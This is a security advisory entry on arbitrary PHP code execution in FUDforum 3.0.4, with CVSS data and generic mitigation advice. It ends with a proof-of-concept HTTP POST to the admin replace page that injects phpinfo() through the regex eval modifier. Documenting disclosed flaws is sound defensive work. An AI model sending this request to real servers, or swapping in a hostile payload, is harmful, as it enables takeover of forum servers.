FUDforum Multiple Vulnerabilities

vendor:

FUDforum

by:

SecurityFocus

7,5

CVSS

HIGH

Arbitrary PHP Code Execution

CWE

Product Name: FUDforum

Affected Version From: 3.0.4

Affected Version To: 3.0.4

Patch Exists: YES

Related CWE: N/A

CPE: a:fudforum:fudforum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

FUDforum Multiple Vulnerabilities

FUDforum is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input. Attackers may exploit these issues to execute arbitrary PHP code within the context of the affected application. Successful attacks can compromise the affected application and possibly the underlying computer.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands. Additionally, applications should not trust user-supplied input and should perform proper input validation.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58845/info

FUDforum is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input.

Attackers may exploit these issues to execute arbitrary PHP code within the context of the affected application. Successful attacks can compromise the affected application and possibly the underlying computer.

FUDforum 3.0.4 is vulnerable; other versions may also be affected. 

POST /adm/admreplace.php HTTP/1.1
Host: fudforum
Referer: http://www.example.com/fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863
Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_ str=(.*)&regex_str_opt=e&regex_with=phpinfo()